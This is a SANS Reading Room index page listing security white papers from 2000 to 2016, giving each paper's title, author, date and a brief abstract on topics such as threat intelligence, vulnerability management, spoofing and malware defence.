The SANS State of Cyber Threat Intelligence Survey: CTI Important and Maturing Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - August 15, 2016- Associated Webcasts: The State of Cyber Threat Intelligence: Part 1: How Cyber Threat Intelligence Is Consumed and Processed The State of Cyber Threat Intelligence: Part 2: The Value of CTI
- Sponsored By: Arbor Networks Hewlett Packard NETSCOUT Systems, Inc. Rapid7 Inc. AlienVault Anomali
It’s 2016, and the attacks (and attackers) continue to be more brazen than ever. In this threat landscape, the use of cyber threat intelligence (CTI) is becoming more important to IT security and response teams than ever before. This paper provides survey results along with advice and best practices for getting the most out of CTI.
-
Scalable Methods for Conducting Cyber Threat Hunt Operations SANS.edu Graduate Student Research
by Michael C. Long II - July 14, 2016Information Security professionals commonly agree that organizations cannot prevent 100% of all cyber attacks. For this reason, organizations are encouraged to practice defense in depth so that if any one security measure fails, another will reduce the exposure and mitigate the impact. However, despite investing countless sums of money, manpower, and time into developing and maintaining a robust security infrastructure, organizations still struggle to identify and respond to cyber intrusions in a timely manner. Cyber Threat Hunt Teams have recently emerged as a proactive defense asset capable of methodically detecting and responding to advanced persistent threats that evade traditional rule or signature-based security solutions. This paper describes scalable methods and practices to plan and conduct cyber threat hunt operations throughout the enterprise.
-
Threat Hunting: Open Season on the Adversary Analyst Paper (requires membership in SANS.org community)
by Dr. Eric Cole - April 12, 2016- Associated Webcasts: Open Season on Cyberthreats: Part 2- Threat Hunting Methodologies and Tools Open Season on Cyberthreats: Part I- Threat Hunting 101
- Sponsored By: HPE Carbon Black DomainTools Endgame Sqrrl Data, Inc. Malwarebytes
Nearly 86% of organizations responding to the survey want to be doing the hunting, albeit informally, as more than 40% do not have a formal threat hunting program in place. Results indicate that hunting is providing benefits, including finding previously undetected threats, reducing attack surfaces and enhancing the speed and accuracy of response by using threat hunting. They also suggest that organizations want to improve their threat-hunting programs and realize more benefits from threat hunting.
-
Automated Network Defense through Threat Intelligence and Knowledge Management by Christopher O'Brien - January 4, 2016
Many organizations know that they should have cyber security threat intelligence, fewer know how to use it and fewer still are actually doing so.
-
Applying Data Analytics on Vulnerability Data by Yogesh Dhinwa - December 23, 2015
An organization with services spread across the globe depends on information technology and information systems. Adoption and compliance of information security standards have become mandatory for many organizations, especially those working under government regulations.
-
Understanding and Preventing Threats to Point of Sale Systems SANS.edu Graduate Student Research
by Richard Hummel - October 15, 2015Data breaches have become a systemic problem in the retail, financial, and healthcare sectors, resulting in mass exfiltration of sensitive customer and/or patient data. These breaches continue to be a major problem for all sectors, but primarily that of the retail sector. It has seen many different Point-of-Sale systems compromised, databases stolen, and customer data sold in underground forums. Many studies and white papers describe and analyze these breaches in detail, but fail to address all aspects of a single breach in one succinct article. As such, practitioners are only educated in part on the threats and the methods to mitigate these threats. This paper will cover three of the more prominent breaches, how the breaches occurred, how data was stolen, and actions organizations need to take to mitigate or, hopefully, eliminate the threats altogether.
-
Observation and Response: An Intelligent Approach Analyst Paper (requires membership in SANS.org community)
by J. Michael Butler - August 7, 2015- Associated Webcasts: Tracking and Observation-How-To and What To Watch For
- Sponsored By: Anomali
A SANS Analyst Program whitepaper by J. Michael Butler. It discusses how properly focused observation and tracking efforts provide intelligence from inside the enterprise by monitoring for indicators of compromise such as odd point-in-time activities on the network, unusual machine-to-machine communications, outbound transfers, connection requests and many other suspicious activities.
-
Applying Lessons Learned for the Next Generation Vulnerability Management System by John Dittmer - June 8, 2015
The objective of this paper is to recommendations for improving a vulnerability management system in development.
-
Using Software Defined Radio to Attack "Smart Home" Systems by Florian Eichelberger - May 1, 2015
The objective of this paper is to describe several plausible attacks that target "Smart-Home" systems using SDR platforms.
-
The Role of Static Analysis in Heartbleed by Jeff Sass - February 12, 2015
Numbered security vulnerabilities known as Common Vulnerabilities and Exposures (CVEs), have been on the rise since the United States Computer Emergency Readiness Team (US-CERT) began tracking them in 1999.
-
Detecting Crypto Currency Mining in Corporate Environments by Jan D'Herdt - February 4, 2015
Crypto currencies [1] such as Bitcoin, Dogecoin, Primecoin, Litecoin, Riecoin and many others are digital currencies that do not follow the normal set of rules for currencies as we know them.
-
Automated Defense - Using Threat Intelligence to Augment by Paul Poputa-Clean - January 19, 2015
Threat Intelligence means different things to different people.
-
Point of Sale Systems and Security: Executive Summary Analyst Paper (requires membership in SANS.org community)
by Wes Whitteker - November 20, 2014- Sponsored By: Carbon Black
The last year has seen scores of point of sale (POS) systems compromised by bad actors. In many cases, these environments were PCI-DSS compliant at the time of compromise. Executives seeking to protect their organizations and POS systems from compromise need to look beyond PCI-DSS and adopt a proactive "offense must inform defense" approach to POS security.
-
Creating a Threat Profile for Your Organization by Stephen Irwin - October 2, 2014
Developing a detailed threat profile, provides organizations with a clear illustration of the threats that they face, and enables them to implement a proactive incident management program that focuses on the threat component of risk. Organizations are facing new types of advanced persistent threat (APT) scenarios that existing risk management programs are not able to evaluate completely and incident management programs are not able to defend against. This paper provides information about how to expand existing risk management models to better illustrate APTs and provides a framework on how to gather threat related information so that detailed threat profiles that include APTs can be developed for organizations.
-
Critical Security Controls: From Adoption to Implementation Analyst Paper (requires membership in SANS.org community)
by James Tarala - September 18, 2014- Associated Webcasts: The Critical Security Controls: From Adoption to Implementation A SANS Survey
- Sponsored By: Qualys Tripwire, Inc. Mcafee LLC EiQnetworks
This SANS survey report explores how widely the CSCs are being adopted, as well as what challenges adopters are facing in terms of implementation of the controls and what they are looking for to improve their implementation practices.
-
MalwareD: A study on network and host based defenses that prevent malware from accomplishing its goals. by Dave Walters - September 17, 2014
Malware is an ever-growing problem on the Internet. Organizations struggle to prevent, detect, and responds to malware threats.
-
Insider Threats in Law Enforcement Analyst Paper (requires membership in SANS.org community)
by Dr. Eric Cole - September 4, 2014- Associated Webcasts: Solving Insider Threats in Law Enforcement
- Sponsored By: Raytheon | Websense
Based on the valuable information they have at their disposal, law enforcement agencies are among those that are prime targets for advanced attacks. While network protection can be extensive and sophisticated, the exploitation of insiders poses a serious threat for illegal access to these agencies.
-
An Opportunity In Crisis by Harshit Nayyar - June 3, 2014
As the cliche saying goes, 'The Chinese word for Crisis contains a symbol for Opportunity'.
-
Improving Security Management with Real-Time Queries Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - April 2, 2014- Associated Webcasts: The Value of On-Demand Endpoint Visibility
- Sponsored By: Mcafee LLC
Product review McAfee Real Time Command with a focus on features and ease of use. Examination of its security-related features found the product to be surprisingly intuitive.
-
DDoS Attacks Advancing and Enduring: A SANS Survey Analyst Paper (requires membership in SANS.org community)
by John Pescatore - March 20, 2014- Associated Webcasts: SANS Survey on Distributed Denial of Service
- Sponsored By: Corero
Survey on the state of DDoS readiness reveals more frequent and sophisticated DDoS attacks as well as lack of preparedness in many enterprises.
-
Framework for building a Comprehensive Enterprise Security Patch Management Program SANS.edu Graduate Student Research
by Michael Hoehl - January 2, 2014The concept of a patch is pretty straight forward and broadly understood. In business terms, patching is a form of quality control and defect repair.
-
SANS Security Analytics Survey Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - October 1, 2013- Associated Webcasts: SANS Analytics and Intelligence Survey Results Part I: The Risk Landscape
- Sponsored By: Guidance Software LogRhythm Hewlett Packard SolarWinds Hexis Cyber Solutions
Survey on next generation of security tools shows that market is in need of analytics and intelligence wrapped around the data that is being/can be collected in organizations.
-
Scaling Analytics to Meet Real-Time Threats in Large Enterprises: A Deep Dive into LogRhythm's Security Analytics Platform Analyst Paper (requires membership in SANS.org community)
by Dave Shackleford - September 10, 2013- Associated Webcasts: Under Pressure: Scaling Analytics to Meet Real-Time Threats
- Sponsored By: LogRhythm
Evaluation of LogRhythm’s real-time analytics capabilities.
-
How DDoS Detection and Mitigation Can Fight Advanced Targeted Attacks Analyst Paper (requires membership in SANS.org community)
by John Pescatore - September 5, 2013- Associated Webcasts: How to Fight the Real DDoS Threat
- Sponsored By: Arbor Networks
Exploration of how DDoS is used as part of advanced targeted attacks (ATAs) and description of how DDoS detection and prevention tools and techniques can also be used against ATAs.
-
Protecting Small Business Banking by Susan Bradley - July 22, 2013
Over the last several years, the use of online banking and other financial transactions have risen dramatically.
-
Implementing a Vulnerability Management Process by Tom Palmaers - April 9, 2013
A vulnerability is defined in the ISO 27002 standard as "A weakness of an asset or group of assets that can be exploited by one or more threats" (International Organization for Standardization, 2005).
-
Beyond Continuous Monitoring: Threat Modeling for Real-time Response Analyst Paper (requires membership in SANS.org community)
by Mark Hardy - October 13, 2012- Sponsored By: SecurityCoverage
Threat modeling, through timely and accurate inputs, can be used by enterprises to mitigate and defeat attack scenarios before they fully unfold.
-
Exploiting Financial Information Exchange (FIX) Protocol? by Darren DeMarco - July 3, 2012
The FIX Protocol website defines The Financial Information eXchange ("FIX") Protocol as “a series of messaging specifications for the electronic communication of trade-related messages” (FIX Protocol Ltd, 2012).
-
Covert Channels Over Social Networks by Jose Selvi - June 4, 2012
Today we live in a malware age, with the malware industry growing exponentially (AV-Test, 2012).
-
Robots.txt by Jim Lehman - May 31, 2012
Every minute of every day the web is searched, indexed and abused by web Robots; also known as Web Wanderers, Crawlers and Spiders.
-
APT Dot Gov: Protecting Federal Systems from Advanced Threats Analyst Paper (requires membership in SANS.org community)
by G. Mark Hardy - October 31, 2011- Sponsored By: F5 Networks, Inc.
This paper describes advanced threats against federal and other governmental systems and provides advice on how to identify and protect the data at risk.
-
BYOB: Build Your Own Botnet by Francois Begin - August 17, 2011
A recent report on botnet threats (Dhamballa, 2010) provides a sobering read for any security professional. According to its authors, the number of computers that fell victim to botnets grew at the rate of 8%/week in 2010, which translates to more than a six-fold increase over the course of the year.
-
Reducing Organizational Risk Through Virtual Patching by Joseph Faust - January 11, 2011
Software patching for IT Departments across the organizational landscape has always been an integral part of maintaining functional, usable and stable software. Historically the traditional patch cycle has been focused on fixing or resolving issues which affect functionality. In recent years, with the advancement of more sophisticated and targeted threats which are occurring in quicker cycles, this focus is dramatically changing. (Risk Assessment – Cisco, n.d.; Executive Office of The United States, 2005) . Corporations and Government now have a greater understanding of potential losses and expenses incurred by not maintaining application security and are moving towards an increased focus on patching and security (Epstein, Grow & Tschang, 2008). With organizations’ reputations, consumer confidence and corporate secrets at risk, corporations and government are recognizing the need to shift and address vulnerabilities at a much faster pace than they historically have done so (Chan, 2004). Over roughly the last ten years, the length of time between the documentation of a given vulnerability in a piece of software and the development of an actual exploit that can take advantage of the weakness in the application, has decreased tremendously. According to Andrew Jaquith, senior analyst at Yankee Group, the average time between vulnerability discovery and the release of exploit code is less than one week. (“Shrinking time from,” 2006). It has also been identified that “99% of intrusions result from exploitation of known vulnerabilities or configuration errors where countermeasures were available” ("Risk reduction and.," 2010) . Clearly these statistics alone can prove daunting for many businesses trying to keep pace and maintain proper defenses against the bad guys.
-
Malicious Android Applications: Risks and Exploitation by Joany Boutet - December 22, 2010
Android is an open-source mobile operating system, based upon a modified version of the Linux kernel, initially developed by Android Inc., a firm purchased by Google in 2005. A Gartner study released on November 2010 outlined that Android has become the second-most popular OS in the world (Gartner, 11/2010). The growth of Android has exceeded their previous study, released last year, in which they had predicted that Android will be the No.2 worldwide mobile operating system in 2012 (The H, 08/10/2009). According to another Gartner study (Gartner, 08/2010)., there will be only a slight difference between Symbian and Android market share in 2014: 30.2% for Symbian against 29.6% for Android.
-
USB - Ubiquitous Security Backdoor SANS.edu Graduate Student Research
by Erik Couture - August 25, 2009The Universal Serial Bus (USB) is an omnipresent data and peripheral communication port that poses a security threat in any modern computing environment. Proposed is a holistic approach to USB port-security, examining the problem from user requirements definition to organizational threat-risk assessment and finally technical and procedural-based risk mitigation.
-
Threat Analysis of Allowing Employee Internet Access SANS.edu Graduate Student Research
by Mason Pokladnik - March 28, 2008The ISO 17799/27001 standard provides a good minimum description of what organizations should be doing to protect themselves, but it should not be the sole focus of your security and audit control design. A better approach is to allow your information-security management-system subcommittees or technical specialists to analyze the threats your organization is likely to face. Then, design your controls around those threats, balancing the cost to mitigate a threat versus the cost of a threat occurring in your environment. Finally, after you have analyzed the threats, you can double check your policies and procedures against a regulatory or management framework, such as ISO17799, SOX, GLBA, HIPPA or PCI.
-
Attack vs. Defense on an Organizational Scale by Omar Fink - December 11, 2007
Historically, the motivation behind most cyber attacks was similar to graffiti, in that the main purpose was to make a mark on somebody else’s territory, to demonstrate technical skill by compromising a web server and defacing the main page, with the primary goal seeming to be simply to make a statement of existence. In recent years, this has evolved to being more concerned about making a profit or creating a political impact.
-
ANI vulnerability: History repeats by Shashank Gonchigar - October 24, 2007
Animated cursors (.ani files) are used to change the appearance of the mouse pointer to an animation. Common example would be Mouse pointer turning into hour glass when the processor is busy. In the month of March 2007 a quite severe vulnerability was announced. It was subsequently exploited because of a flaw in the code which handled these files. This paper is a discussion about the ANI header buffer overflow vulnerability (Microsoft Security Bulletin MS07-017 - CVE-2007-0038). As we progress, we will understand what caused this vulnerability, analyze an exploit (PoC), understand the heap spraying technique employed by this exploit and finish with the incident handling process.
-
A System of Persistent Baseline Automated Vulnerability Scanning and Response in a Distributed University Environment by Chet Langin - September 18, 2007
This paper describes and analyzes a persistent automated baseline vulnerability scanning procedure in a university (“The University”), including preparation, response, and follow up procedures. A Ruby script called run_nxscan.rb, written by the author, runs the nxscan scanning tool (York University, 2007) and processes the output. But this paper is more about the overall system used than just about a script and the nxscan tool. See Wack, Tracy, and Souppaya (2003) for a list of some other vulnerability scanning tools.
-
Malware Analysis: Environment Design and Artitecture by Adrian Sanabria - August 2, 2007
The goal of this paper is to discuss the architecture and design necessary to create an effective malware analysis lab environment, and to explore possibilities beyond the traditional two or three system VM-based lab.
-
Visually Assessing Possible Courses of Action for a Computer Network Incursion by Grant Vandenberghe - June 15, 2007
This study has suggested that an additional course of action step be added to the incident handling process. This addition would require that an incident handler identify the effects of his action before disrupting ongoing commercial or military operations.
-
A Survey of Wireless Mesh Networking Security Technology and Threats by Anthony Gerkis - October 18, 2006
This paper will summarize the technologies and challenges related to wireless mesh networks.
-
Exploiting BlackICE When a Security Product has a Security Flaw by Peter Gara - July 9, 2005
This paper contains a fictional story about a computer expert who gets into evil ways and tries to denigrate his ex-colleague at her new workplace.
-
A Spyware Survival Toolkit by Peter McGranaghan - May 17, 2005
This paper will discuss the sources of spyware, the types of spyware, and methods of prevention, detection, and removal of spyware.
-
What is Santy bringing you this year? by Pieter Danhieux - May 5, 2005
This early and evil "Santa Claus" present caused some serious havoc for administrators of phpBB bulletin board software around Christmas 2004, defacing almost 40 thousand phpBB sites in a short period.
-
Phishing: An Analysis of a Growing Problem by Anthony Elledge - July 25, 2004
Email has become an invaluable communication tool for both business and personal use. Among the many security issues that now affect computer users, there is a growing threat known as "phishing".
-
Electronic Toll Collection by Don Flint - July 25, 2004
Since 1992 active Radio Frequency Identification (RFID) tags have been used in vehicles to automate the toll process on toll roads, bridges, and tunnels in a process called Electronic Toll Collection (ETC). These tags are mounted to the windshield or externally surrounding the license plate on a vehicle and read as the vehicle proceeds without stopping through special lanes at the toll plaza.
-
Risk-Eye for the IT Security Guy by Thomas Siu - May 2, 2004
An enterprise risk management workflow model is presented to illustrate the `big picture' of risk management, the key to developing a "keen eye" for IT security risks as a part of the overall IT management doctrine.
-
Skimming and Its Side Effects by Nobie Cleaver - March 9, 2004
What I have learned in my research has truly amazed me and I endeavor to share some of that information in this paper. I will define skimming, describe what a skimming device may look like, discuss how skimming is done, provide some statistical information and provide some pointers on how to avoid being skimmed and what to do if it happens.
-
Vulnerability Management: Tools, Challenges and Best Practices by Cathleen Brackin - December 13, 2003
This paper will outline the key steps to Vulnerability Management, and provide an in-depth look at the tools, challenges and best practices of each part of the VM lifecycle.
-
Managing vulnerabilities exposed by Windows services. by James Williams - November 6, 2003
This paper looks at the vulnerabilities exposed by Windows services, how and why these risks occur, identify the tools for manipulating Windows services, and provide solutions to secure these identified vulnerabilities.
-
Corporate Anti-Virus Protection - A Layered Approach by Elizabeth Peyton - November 6, 2003
This paper offers a "defense-in-depth" solution for large enterprises and corporations where there may be thousands of entry points through which viruses can enter, causing possible system damage and information theft or loss.
-
Examining the RPC DCOM Vulnerability: Developing a Vulnerability-Exploit Cycle by Kevin OShea - October 6, 2003
This paper proposes to build on the vulnerability life-cycle work first proposed by Arbaugh, Fithen and McHughi to establish a detailed framework for vulnerability analysis.
-
Vulnerabilities &; Vulnerability Scanning by Ken Houghton - September 8, 2003
This white paper will discuss the benefits and pitfalls of Vulnerability Scanning and will suggest an approach suitable for small and medium-sized businesses, as well as discussing the possibility of buying this as a service from a specialist agency.
-
Assessing Threats To Information Security In Financial Institutions by Cynthia Bonnette - August 8, 2003
This paper explores key issues related to threat assessment, including essential elements, methodologies, and common pitfalls, along with a recommended approach for completing and documenting this activity.
-
Printer Insecurity: Is it Really an Issue? by Vernon Vail - August 8, 2003
This document starts with a brief look at basic system and network security principles, continues with the revealing of some printer threats and vulnerabilities, and ends with a discussion about how to deal with the issue.
-
Anatomy of an IP Fragmentation Vulnerability in Linux IPChains: Investigating Common Vulnerabilities and Exposures (CVE) Candidate Vulnerability CAN-1 by Karim Sobhi - July 14, 2003
This paper investigates a potential IP fragmentation vulnerability in Linux IPChains.
-
Vulnerability naming schemes and description languages: CVE, Bugtraq, AVDL and VulnXML by Michael Rohse - May 30, 2003
These limitations inspired two new proposals: AVDL (Application Vulnerability Description Language) and VulnXML. With them it will be possible to directly import a describing XML document into a scanning tool and the tool will generate and launch the vulnerability scan. AVDL and VulnXML will be described and discussed in this paper.
-
10 Vulnerabilities a Scanner Might Not Find by Jeffrey King - May 12, 2003
This paper particularly serves as a resource to those who are new to the information assurance field, and provides an insight to two common protocols used in Internet security.
-
Beyond Conventional Terrorism...The Cyber Assault by Rajeev Puran - April 6, 2003
The text presented in this practical write up is established to review the various intents, events, acts and possibilities of computing technology based terrorism and warfare.
-
Worms as Attack Vectors: Theory, Threats, and Defenses by Matthew Todd - February 22, 2003
This paper provides a brief discussion of what constitutes a typical worm, along with a brief history, reasons they may be released, and who might gain from their use.
-
How do we define Responsible Disclosure? by Stephen Shepherd - February 19, 2003
This paper explores some key events in vulnerability disclosure, the conceptual differences between full disclosure, nondisclosure, limited disclosure and responsible disclosure, then examines some existing disclosure policies and proposed standards.
-
Security for Online Transaction Processing in a White Label Financial Switch by Fabian Soler - December 28, 2002
White label financial switches have introduced automatic banking machines (ABMs) in niche markets by taking advantage of cheap modern network and PC technology.
-
A New Generation of File Sharing Tools by Dan Klinedinst - December 15, 2002
Excessive file sharing can have serious effects on a variety of organizations, from lost revenue to lost productivity and wasted resources.
-
Large Scale Network Incidents - What Can We Do? by Jay Garden - December 10, 2002
This paper looks into the similarities between the two types of attacks and discusses ways to mitigate the risk from an Internet-wide perspective.
-
Potential Vulnerabilities of Timbuktu Remote Control Software by David Batz - October 9, 2002
This paper is neither for nor against the use of Timbuktu software as a Windows Remote Access /Remote Control solution, however, there are a number of potentially serious vulnerabilities that may be encountered through the use of the product.
-
Cyber Scam Artists: A New Kind of .con by Robert Fried - June 12, 2002
This paper will closely examine the emergence of the fraudster into cyberspace and analyze the steps being taken to help deal with the issue of online fraud.
-
Buffer Overflows for Dummies by Josef Nelißen - May 1, 2002
This paper tries to fill the gap between Buffer Overflows and errors within program source code, providing an in-depth discussion on stack smashing, frame pointer overwrite, return-into-libc, heap based overflow techniques and possible countermeasures.
-
SSL Man-in-the-Middle Attacks by Peter Burkholder - February 1, 2002
This paper examines the mechanics of the SSL protocol attack, then focuses on the greater risk of SSL attacks when the client is not properly implemented or configured.
-
The Instant Messaging Menace: Security Problems in the Enterprise and Some Solutions by Dan Frase - January 31, 2002
In this paper, the security threats posed by the use of consumer grade instant messaging clients in the enterprise, including privacy and identity issues are discussed, along with malware and bug vulnerabilities.
-
Cross-Sight Scripting Vulnerabilities by Mark Shiarla - January 9, 2002
This paper states that cross-site scripting is a potential risk for most Web servers.
-
ICMP Attacks Illustrated by Christopher Low - December 11, 2001
This paper shows how ICMP can and has been used in many phases of an attacker's advance in a system compromise.
-
Remote Access White Paper by Ken Stasiak - November 28, 2001
This paper looks at remote access security issues, pointing to how remote access solution can reduce administration time and increase security.
-
Internal Threat - Risks and Countermeasures by Jarvis Robinson - November 15, 2001
This paper cover the risks associated with insider threat, and provides practical counter-measures, which should challenge the reader to focus on the people and processes that protect information rather than technology.
-
Address Resolution Protocol Spoofing and Man-in-the-Middle Attacks by Robert Wagner - September 27, 2001
This paper is designed to introduce and explain ARP spoofing.
-
Analysis of FTP Hijack by Phong Huynh - September 19, 2001
This paper demonstrates how historical lessons can improve our skills as InfoSec professionals and can be used as a platform for management to understand the technology solutions we are proposing.
-
Outsourcing and the Increased Dangers of 'Dial Up' Access by Paul Jenkinson - September 15, 2001
The objective this paper is to highlight how the current trend of outsourcing support services can dangerously augment the already well-known issues surrounding dial up access to a corporate network.
-
Spoofed IP Address Distributed Denial of Service Attacks: Defense-in-Depth by Steven Bass - September 12, 2001
The purpose of this paper is to look at a defense-in-depth approach to spoofed IP address DDoS attacks, including known defenses, new techniques, and recent developments.
-
Free InfoSec Training, Compliments of History by Chris Bachmann - August 21, 2001
This paper Demonstrates how historical lessons can be used as a platform for management to understand the technology solutions we are proposing and how historical lessons can improve our skills as InfoSec professionals.
-
Peer-to-Peer Security and Intel's Peer-to-Peer Trusted Library by Chris McKean - August 20, 2001
Intel has released a code library that software developers can use to strengthen the security of, and add "trust" to new peer-to-peer applications, examined in this paper.
-
Instant Messaging: How Secure Is It? by Susan Willner - August 19, 2001
This paper describes Instant Messaging, a popular method of communication, although there are some security issues that should be considered.
-
The Changing Face of Distributed Denial of Service Mitigation by Justin Stephen - August 16, 2001
This paper reviews traditional best practices and tools for DDoS mitigation, discusses the inherent weaknesses of these best practices, the developing legal issues and trends that may soon be forcing change on how DDoS attacks are combated, and looks at the new generation of tools becoming available for mitigating these attacks.
-
Defending Against Code Red II Using Symantec NetProwler and Intruder Alert, ddos by Kenneth Donze - August 15, 2001
In this paper I will address the use of Symantec's NetProwler, network based IDS (NIDS), and Intruder Alert, host based IDS (HIDS), to detect and react to the Code Red II worm.today.
-
Electromagnetic Attack: Is Your Infrastructure and Data at Risk? by Michael Hayden - August 10, 2001
Attack of the infrastructure by way of radio frequency devices is technically possible and has been demonstrated on a small scale.
-
Unicode Vulnerability - How & Why? by Andrew Brannan - August 7, 2001
This paper discusses the power and flexibility of the Unicode vulnerability make it one of the most popular, and therefore dangerous, vulnerabilities currently used by attackers today.
-
An Overview of Gnutella by Brenda Batkins - July 27, 2001
This document addresses origins of Gnutella, what it is and how it works as well as some Gnutella-compatible software, along with possible security concerns.
-
Cyber-stalking, Privacy Intrusion at It's Scariest by Pamela Valentine - July 27, 2001
This paper describes Cyber-stalking and what you can do, or not do, to prevent it.
-
Vulnerability Assessments: The Pro-active Steps to Secure Your Organization by Robert Boyce - July 12, 2001
This paper provides an in-depth look at vulnerability assessments and discusses pro-active steps to secure your organization.
-
Kernel Rootkits by Dino Zovi - July 4, 2001
This paper provides an in-depth discussion on kernel rootkits.
-
Big Brother is Watching: An Update on Web Bugs by Steve Nichols - July 3, 2001
This paper discusses various types of script and executable web bugs that can retrieve almost any information the programmer wishes to obtain from the user's computer.
-
Aspects of Biological Evolution and Their Implications for Unix Computer Security by Michael Folsom - July 3, 2001
This paper presents aspects of biological evolution and their implications for Unix computer security.
-
Spoofing: An Overview of Some the Current Spoofing Threats by Neil Riser - July 1, 2001
This paper introduces and explains four forms of information spoofing: IP, ARP, Web, and DNS.
-
FTP and the Warez Scene by Shelli Crocker - December 14, 2000
Although software theft via FTP is very common, the risk of FTP abuse can be reduced by scanning networks for anonymous FTP sites, monitoring FTP activity, and securing FTP server configuration.
-
Introduction to IP Spoofing by Victor Velasco - November 21, 2000
This paper describes the use of IP spoofing as a method of attacking a network in order to gain unauthorized access.
-
Why Bother About BIOS Security? by Robert Allgeuer -
This paper gives: an overview of the BIOS and its functions; a detailed discussion of known threats to the BIOS and the hardware of a PC - as well as how they could be exploited; and, finally, countermeasures that can mitigate the risks
Most of the computer security white papers in the Reading Room have been written by students seeking GIAC certification to fulfill part of their certification requirements and are provided by SANS as a resource to benefit the security community at large. SANS attempts to ensure the accuracy of information, but papers are published "as is". Errors or inconsistencies may exist or may be introduced over time as material becomes dated. If you suspect a serious error, please contact webmaster@sans.org.
All papers are copyrighted. No re-posting or distribution of papers is permitted.
SANS.edu Graduate Student Research - This paper was created by a SANS Technology Institute student as part of the graduate program curriculum.